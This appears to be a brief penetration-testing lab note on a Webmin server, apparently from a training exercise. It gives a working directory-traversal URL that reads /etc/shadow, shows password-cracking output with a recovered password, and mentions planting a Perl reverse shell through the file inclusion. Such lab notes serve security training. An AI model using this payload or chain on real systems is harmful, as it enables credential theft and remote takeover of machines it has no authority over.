10.11.1.141

Found this URL

http://10.11.1.141:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow10.11.1.141

LFI by using searchsploit. Scripts didnt work from searchsploit but i manually was able to get this info by reading the script.

Found passwords from shadow file

Press 'q' or Ctrl-C to abort, almost any other key for status loading1 (?) 1g 0:00:00:11 9.31% (ETA: 00:59:29) 0.09074g/s 134992p/s 326922c/s 326922C/s mindthegap..mimalditavida BUGZBUNNY (?)

loading1 BUGZBUNNY

once on the machine

we can upload a perl reverse shell into tmp and call the shell by using the LFI

Crack Shadow Hashes After Getting Root on a Linux SystemMedium

CGIHackTricks

Webmin LFD to LFI - 小小leo - 博客园

advisories/[GTSA-00130] Webmin 1.920 Remote Code Execution.txt at master · jamesbercegay/advisoriesGitHub

meh : https://github.com/russweir/OSCP-cheatsheet/blob/master/File%20Inclusion.md

Last updated 1 year ago